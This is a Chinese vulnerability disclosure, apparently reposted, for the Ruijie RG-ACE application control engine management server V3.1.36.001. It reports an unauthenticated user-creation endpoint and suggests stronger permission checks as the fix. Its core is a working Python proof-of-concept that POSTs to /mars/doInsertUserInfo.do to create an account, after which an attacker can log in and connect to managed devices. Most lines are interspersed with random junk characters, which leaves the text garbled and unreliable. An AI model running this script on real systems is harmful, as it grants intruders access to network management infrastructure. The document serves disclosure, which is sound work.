锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
3 l* \" x( F' Z) [- z2 S5 i5 o5 s8 i0 h% l% n6 |
1 d8 y8 ?9 H, V/ ^ O, U) w测试的具体版本是; P$ h& j5 k/ B$ m0 b1 m: W
产品名称: 锐捷应用控制引擎+ L2 S2 S+ g7 E& W6 K5 S( p
版本号: 3.1.36.001 TC0 [' |; _/ g* H+ I" o) ?& X
编译时间: 201104291730 K \: S& S1 @& }! e9 }
" s6 A6 f, N5 w, z8 {) ?* j
% |8 W9 n& U5 s2 X# Q1 w$ m漏洞证明:
$ I$ ]% n6 p& o9 M, Y6 A
" c3 O( e7 ?& e# M
4 {; p+ l4 m0 ]) V5 m1 v8 n& k. e( @$ ^9 M& t( b6 G* p* i
7 {9 H5 W; N- P- I5 _! x
3 z/ X3 s8 W. e5 G, R8 E# H
9 k# z [4 e: R执行脚本
, W! }/ d! H) B, H- V# J2 c1 _9 a#! /usr/bin/env python" }& l: V8 A0 u7 Z4 f5 @. S
#coding=gbk: `, ?) w* Y# e/ j0 i
#RG-ACE管理服务器 V3.1.36.001
! }# W+ |, O+ w; K* Vimport urllib2, urllib,cookielib
# x, \3 A6 [# e* |7 A) vurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP: `! J+ b8 g- I7 z" G, q
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))1 k( H' r! O" u _+ B5 ~3 z
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
- L1 R3 h3 V( Ipost=(("event","userManager.doInsertUserInfo"),, L: U+ y- g* U3 q
("useractionname","addButtonValue"),
% x4 P2 C! w }9 E9 w, V3 H$ h("useropermanager","userManager"),
- s9 Q+ ^9 V. s" F("userName","t"), #######账号自己加) X. c0 e6 G# Q6 d6 u
("pwd","aaaaaa"),######密码自己加
( X# K6 Y& b! E- U9 T; [("trueName","ad"),
6 d8 ? E f/ e$ q+ L$ P- ^("email",""),4 `* w$ {+ p9 w
("mobilePhone",""),
g" @% `+ Z0 a% q- N a("officePhone",""),4 ]* v( z2 o1 P* G% ]
("addr",""),; j" V: s. U; C3 n( m: Q
("submit","确定"))% P- h# d; J0 ~# Z0 J* Y+ m$ ^
urllib2.install_opener(opener)
' n) n: x% \& o2 }! h& e: u+ sp=urllib2.urlopen(url, urllib.urlencode(post)).read()2 X! z) h$ X/ q: a
print "Done"5 s& G- _# O2 y3 ]
# ^9 J. s" r6 S% S% s' G
登录,连接设备
1 s" S0 w- ~' o9 T
0 @5 [9 [0 |% {" q6 e
1 c( K; h5 p& O" R, M5 H, n# h/ V
2 i. y# I8 s& B. U. b: G9 U7 f( G: C
# f6 N o: Q4 R8 H! t, D
默认的管理员admin权限更大点# V! }* @1 p( [5 q+ \
4 }/ h$ r( A1 T% s
4 k$ q2 Y: k8 T- A% t0 a# w4 T) e- x/ s9 d) D& J+ }# {
8 { f& b9 I# m
( r( n, L( ]- U) f% @5 d
修复方案:. s7 P! |" h7 k1 v9 A; J, l
加强对接口的权限验证; w4 K$ W! x; F. S% t6 i
2 X: C& _6 \0 ~/ L- C# |' `
|